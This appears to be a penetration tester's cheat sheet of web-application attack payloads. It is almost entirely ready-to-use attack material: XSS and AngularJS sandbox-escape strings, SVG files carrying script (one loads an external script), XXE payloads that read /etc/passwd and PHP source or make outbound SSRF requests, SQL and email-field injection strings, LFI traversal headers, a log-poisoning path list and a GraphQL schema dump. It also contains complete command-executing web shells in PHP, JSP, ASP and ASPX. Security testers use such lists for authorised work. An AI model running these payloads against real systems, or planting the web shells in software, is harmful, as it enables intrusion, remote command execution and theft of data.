Payloads
Web application pentesting
Cross-Site Scripting (XSS) payloads
Short XSS payloads in general: (source)
<iframe src=//url.rs>
<script/src=//url.rs>
<x/oncut=alert(1)>a
<svg onload="alert(1)" <="" svg=""
XSS via SSTI (or CSTI)
{{constructor.constructor('alert(document.domain)')()}}
AngularJS very short payload: (source)
{{[]."-alert`1`-"}}
Sourced from Portswigger:
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
URL based XSS smuggling
Via portswigger
<script>throw onerror=eval,name</script>
<script>throw onerror=eval,'/*'+location</script>
<svg onload="throw top.onerror=eval,'/*'+URL">
<body onload="throw onerror=eval,'/*'+location">
XSS via PDF
Via PDF file (sandboxed):
XSS via SVG
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("xss via svg");
</script>
</svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"
height="200"
zoomAndPan="disable"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:space="preserve">
<!-- Script linked from the outside-->
<script xlink:href="https://your-urls-here" />
<script>
//<![CDATA[
alert("ble");
]]>
</script>
</svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert('xss via svg')">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>
XXE injection
Externally loading in a dtd file, which would result in SSRF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://IP:PORT"> ]>
<root>
<email>&somename;</email>
<password>yourpassword</password>
</root>
XXE via SVG
Local file inclusion via SVG with XXE injection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
Source code disclosure via SVG with XXE injection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=yoursource.php"> ]>
<svg>&xxe;</svg>
SQL injection payloads
💡
Will not go into depth how to SQL inject. Finding errors and validations is what we want.
Check for errors with the following parameters:
'
"
#
;
)
--
-- -
/*
`)
`
,
/* */
File Upload
Web shells
Web shell via PHP with interactive ?cmd=command:
<?php system($_REQUEST['cmd']); ?>
Directly execute a command via PHP payload:
<?php system('id'); ?>
Web shell via JSP file upload:
<%@ page import="java.util.*,java.io.*"%>
<%
// webshell
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
Web shell via ASP:
<%
Dim oS, oSNet, oFSys, oF, szCMD, szTF
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form("C")
If szCMD <> "" Then
szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & """", 0, True)
Response.Write szTF
Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G everyone:F", 0, True)
Set oF = oFSys.OpenTextFile(szTF, 1, False, 0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type="text" name="C" size="70" value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
Machine: <%= oSNet.ComputerName %><BR>
Username: <%= oSNet.UserName %><BR>
<%
If IsObject(oF) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oF.ReadAll)
oF.Close
Call oS.Run("win.com cmd.exe /c del " & szTF, 0, True)
End If
%>
Web shell via ASPX
<%@ WebService Language="C#" Class="Service" %>
using System;
using System.Web;
using System.Web.Services;
using System.IO;
using System.Diagnostics;
[WebService(Namespace="")]
[WebServiceBinding(ConformsTo=WsiProfiles.BasicProfile1_1)]
public class New_Process:Process{public New_Process(string s){}}
public class Service:WebService{
[WebMethod]
public string Test(string Z1,string Z2){
var c=new ProcessStartInfo(Z1,Z2){
UseShellExecute=false,
RedirectStandardOutput=true,
RedirectStandardError=true
};
var e=new New_Process("x"){StartInfo=c};e.Start();
var o=e.StandardOutput;var r=e.StandardError;e.Close();
var R=o.ReadToEnd()+r.ReadToEnd();
var resp=HttpContext.Current.Response;
resp.Clear();
resp.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
resp.Write("<data><![CDATA[");
resp.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D");
resp.Write("]]></data>");
resp.End();
return R;
}
}
MIME-Type filters
| Filetype | First bytes | Data |
|---|---|---|
| PNG | 89 50 4E 47 0D 0A 1A 0A | ‰PNG␍␊␚␊ |
| JPEG/JPG | FF D8 FF DB | ÿØÿÛ |
| GIF | 47 49 46 38 37 61 | GIF87a / GIF89a |
| 25 50 44 46 2D | %PDF- |
Content-Types
A small list for used content-types:
| Content-Type | Description |
|---|---|
| text/html | HTML documents |
| application/javascript | JavaScript files |
| image/svg+xml | SVG vector images |
| image/png | PNG images |
| image/jpeg | JPEG images |
| application/xml | XML data |
| application/json | JSON data |
Log Poisioning
/var/log/apache2/error.log
/var/log/apache2/access.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
C:\nginx\log\access.log
C:\nginx\log\error.log
# PHP
/var/lib/php/sessions/sess_YOURSESSIONCOOKIE
# Other
/proc/self/eviron
/proc/self/fd/{bruteforce number}
/var/log/sshd.log
/var/log/mail
/var/log/vsftpd.log
Email payloads
Source for the payloads
| Attack Type | Email Address |
|---|---|
| XSS | test+(<script>alert(0)</script>)@example.comtest@example(<script>alert(0)</script>).com"<script>alert(0)</script>"@example.com |
| Template injection | "<%= 7 * 7 %>"@example.comtest+(${{"7"*7}})@example.com |
| SQLi | "' OR 1=1 -- '"@example.com"mail'); DROP TABLE users;--"@example.com |
| SSRF | john.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1] |
| Parameter pollution | victim&email=attacker@example.com |
| (Email) Header injection | "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com"recipient@test.com>\r\nRCPT TO:<victim+"@test.com |
Local File Inclusion
For LFI vulnerabilities in Django, Rails and NodeJS use the following payloads in the Accept: header (source):
Accept: ../../../../../../../../etc/passwd{{
Accept: ../../../../../../../../etc/passwd{%0D
Accept: ../../../../../../../../etc/passwd{%0A
Accept: ../../../../../../../../etc/passwd{%0D{{
Accept: ../../../../../../../../etc/passwd{%0A{{
Accept: ../../../../../../../../etc/passwd{%00
Accept: ../../../../../../../../etc/passwd{%00{{
GraphQL
Dump the database schema without fragments:
__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}